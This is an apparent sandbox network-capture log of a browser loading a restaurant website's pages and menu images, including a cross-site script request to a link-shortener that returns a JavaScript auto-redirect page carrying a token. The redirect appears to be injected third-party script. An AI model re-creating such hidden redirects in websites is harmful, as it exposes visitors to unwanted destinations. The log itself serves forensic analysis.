                                                                                                                                                    2024-10-01 04:26:44 UTC1458INData Raw: 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 69 6e 64 65 78 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 3e 48 6f 6d 65 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 61 62 6f 75 74 55 73 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 3e 41 62 6f 75 74 20 55 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76
                                                                                                                                                    Data Ascii: em"> <a href="index" class="nav-link" >Home</a> </li> <li class="nav-item"> <a href="aboutUs" class="nav-link" >About Us</a> </li> <li class="nav
                                                                                                                                                    2024-10-01 04:26:44 UTC7INData Raw: 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    55192.168.2.449818162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:44 UTC665OUTGET /assets/imgs/menu_imges/Chicken_Tikka_Kabab.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:44 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:44 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 18:55:42 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 43281
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:44 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:45 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 55 00 00 00 63 08 06 00 00 00 ea d6 4c ea 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRUcLpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:45 UTC6016INData Raw: 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:45 UTC16384INData Raw: 8d e6 5b d6 1a 6e bd fc 65 ae bd f0 05 2a cd e9 b3 c7 1f 7e f2 1f 37 e6 e6 57 46 bd ce bf 69 ef 6f fe 2f 49 96 ee 14 7b 1b 14 3b 6b 0c bd fa c7 bb f5 f3 ff 38 6c 2e 97 93 41 e7 55 97 a5 ff 67 84 58 fb ce f3 59 24 01 11 d3 e2 0e 0a 83 e3 83 af cb 39 b7 a0 f3 e5 7c 5e 48 01 8e 3f d6 a1 b5 21 c8 07 38 f7 c7 fc 85 3f c5 11 8d 86 7c f4 87 7f 92 c3 bd 7d 7e f5 1f fe 03 b4 00 29 be fd ef c6 c2 fc c2 2c b3 0b 73 f7 07 c5 da cf 39 29 e7 93 34 a5 5e ad 7f c3 f3 83 96 54 8a db af 7f 9d bb ef bc 84 d2 3e 42 a9 33 4a 8b 8f ba 34 22 8d e2 ff 34 19 76 7f 2f 4d 46 3b 51 06 4e d5 49 74 39 a7 83 e0 b4 a7 1d 19 f6 94 c1 86 1c 3d e2 6f 7b 94 04 93 61 a2 36 b8 14 27 d4 0f b8 7a 97 d3 49 92 1a 84 e0 3f 6c d5 f1 c7 27 a3 3e f7 3d fb 09 ce 7f f4 47 d8 dc d9 85 3f 23 c3 9a 2c 63
                                                                                                                                                    Data Ascii: [ne*~7WFio/I{;k8l.AUgXY$9|^H?!8?|}~),s9)4^T>B3J4"4v/MF;QNIt9=o{a6'zI?l'>=G?#,c
                                                                                                                                                    2024-10-01 04:26:45 UTC4497INData Raw: 4d c9 d2 04 93 7a 47 64 8f 88 e8 60 8d a8 b3 8f f4 25 22 9f 61 3d b0 62 82 c4 34 b8 bb bd c7 ce f5 75 16 66 2a 9c 7a f0 2c 4a f6 d9 bf 13 51 9c a8 f3 ca 97 5e a5 38 eb 73 e2 91 87 28 2c 5d 20 c9 57 31 f1 80 38 8a c8 15 0b 34 4a c1 c8 c5 83 5f b1 d6 fc 4f 4a ab 5d 1d e4 d8 bc f4 05 ae 7c e5 b3 e8 e2 e4 18 76 61 c7 3d f8 0e 28 86 1e e4 4b a8 72 89 0c 03 e9 70 5f 54 8b ff f3 fc 87 7e e2 b9 bb bf f7 6f 97 df b8 b4 c1 2b 23 cd bd d8 c3 af 07 c8 7c 93 c9 5a 8d f3 8f 16 30 d5 39 5a ad 32 91 f6 e9 14 42 46 69 48 5f 57 d8 ab 4d b1 df 4f a0 b8 48 63 79 89 6a b3 8c 30 29 51 94 20 e3 84 24 1e 82 c9 28 34 32 3a 7b d7 b8 74 ed 3a 52 80 ce 24 66 18 33 8c 61 ea c4 39 d2 dc 32 fd fa 29 4e dc b7 c2 59 ed d0 6e 48 96 1a 92 38 42 fa 86 d0 8d bb 9b ad 33 38 2c 59 32 04 99 8e
                                                                                                                                                    Data Ascii: MzGd`%"a=b4uf*z,JQ^8s(,] W184J_OJ]|va=(Krp_T~o+#|Z09Z2BFiH_WMOHcyj0)Q $(42:{t:R$f3a92)NYnH8B38,Y2


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    56192.168.2.449821162.210.196.1684435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:45 UTC533OUTGET /eWD0j3 HTTP/1.1
                                                                                                                                                    Host: cuturls.net
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:45 UTC452INHTTP/1.1 200 OK
                                                                                                                                                    accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                    cache-control: max-age=0, private, must-revalidate
                                                                                                                                                    connection: close
                                                                                                                                                    content-length: 479
                                                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:44 GMT
                                                                                                                                                    server: Cowboy
                                                                                                                                                    set-cookie: sid=5dca005c-7fad-11ef-96cd-50b366033b7c; path=/; domain=.cuturls.net; expires=Sun, 19 Oct 2092 07:40:52 GMT; max-age=2147483647; secure; HttpOnly
                                                                                                                                                    2024-10-01 04:26:45 UTC479INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 73 3a 2f 2f 63 75 74 75 72 6c 73 2e 6e 65 74 2f 65 57 44 30 6a 33 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 79 4e 7a 63 32 4e 44 41 77 4e 53 77 69 61 57 46 30 49 6a 6f 78 4e 7a 49 33 4e 7a 55 32 4f 44 41 31 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62
                                                                                                                                                    Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('https://cuturls.net/eWD0j3?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNzc2NDAwNSwiaWF0IjoxNzI3NzU2ODA1LCJpc3MiOiJKb


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    57192.168.2.449822162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:45 UTC663OUTGET /assets/imgs/menu_imges/Tikka_Shish_Kabab.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:45 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:45 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:01:32 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 38907
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:45 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:45 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5f 00 00 00 4a 08 06 00 00 00 dd 57 88 dd 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDR_JWpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:45 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:45 UTC6491INData Raw: 49 b9 28 c9 e6 8a bc 74 3a e6 99 af 6c 70 cf 1d 43 90 09 31 1f 9c 63 e6 91 bd 5c ff fc 2b 84 9f bd c2 da b9 00 bb e8 b2 75 cf 34 cb 3d c9 dd 7e c2 bd 13 39 7a 7e 8a df 0d 30 8a 39 2e 5d eb d0 df 69 30 94 0d 30 e8 b3 d2 34 71 94 66 bb 1f 93 9b ad f1 c0 dd a3 98 b1 cb 76 2b e1 fa e5 6d ca 05 83 5b ee 3c 8e 29 6b 78 c5 61 36 bb db fc d1 1f fe 31 4b 6b 6d b2 a9 cf 0f ff d8 77 f1 03 3f f3 ab 44 b1 66 73 65 81 5c 71 08 c7 31 d0 4a 21 a5 89 eb 3a 04 81 cf ab 67 cf 7c 77 9a a6 bf 75 f1 ec 29 56 16 2f 33 34 b9 87 34 f4 d1 61 97 6c b6 48 6d 7a 16 cb 29 60 82 f5 ad 86 11 55 94 92 95 ac 97 1f da de de ac ac ad 2c 8f 54 aa e3 63 d9 82 e9 8e 1c 3a 30 bc d1 de b8 65 e3 cc 8b c5 f9 5b a6 49 63 87 17 4f 6e 10 06 16 8e 35 58 62 d7 b7 8b 14 3c 0f c3 35 b9 de 0e b1 a5 a6 3a
                                                                                                                                                    Data Ascii: I(t:lpC1c\+u4=~9z~09.]i004qfv+m[<)kxa61Kkmw?Dfse\q1J!:g|wu)V/344alHmz)`U,Tc:0e[IcOn5Xb<5:


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    58192.168.2.449825162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:45 UTC656OUTGET /assets/imgs/menu_imges/Sekh_Kabab.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:45 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:45 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 22:58:04 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 39783
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:45 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:45 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 67 00 00 00 4e 08 06 00 00 00 3d e2 08 07 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRgN=pHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:45 UTC16384INData Raw: 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:45 UTC7015INData Raw: f2 ca c2 33 cd 7a 71 db c0 f0 f8 a3 d9 74 df a7 15 41 0e 0b 12 e8 c1 08 95 72 9d 7a a7 8b a4 0a e8 ba 8c 65 0b a4 12 71 2c db a1 d5 68 11 0d 49 48 5e 92 66 7b 19 35 04 e9 04 24 a3 a0 78 36 e7 2f 2f f7 66 aa 8b 34 ab 90 09 8b 4c 5d 92 19 18 8c a3 c9 09 ae 36 4b 44 ed 3a 23 2b 23 68 c1 16 9f fd 8a 45 48 83 0f e7 e6 b8 38 3f ca 3f 39 a1 73 73 7a 9d bb 26 e0 c0 1e 18 1f f6 67 bf 35 d9 5f 8e 50 ad c2 95 25 b8 78 19 ca d3 d0 12 21 38 fa 1c 73 d2 73 04 a4 53 5c fa dc 1c a7 be 51 63 24 dd 45 0e 41 fe d1 bd cc 5c 85 b8 b9 46 44 2b 62 34 45 96 ab 11 8e 95 53 3c 18 0e 72 e5 d8 63 3c f3 f5 c7 38 70 f3 23 bc f7 43 3f 45 38 18 e6 8b 2f 9f e0 a9 27 9f 25 da 5d e1 81 87 1e 64 df 81 db 39 72 db ed 74 ac 23 3c f0 96 87 08 05 75 44 d1 21 9a 48 83 a8 73 fd d4 8b 9c 3c dd 65
                                                                                                                                                    Data Ascii: 3zqtArzeq,hIH^f{5$x6//f4L]6KD:#+#hEH8??9ssz&g5_P%x!8ssS\Qc$EA\FD+b4ES<rc<8p#C?E8/'%]d9rt#<uD!Hs<e


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    59192.168.2.449823162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:45 UTC665OUTGET /assets/imgs/menu_imges/Mixed_Kabab_Skewers.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:45 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:45 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:09:38 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 38979
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:45 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:45 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 66 00 00 00 4d 08 06 00 00 00 54 b4 11 97 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRfMTpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:45 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
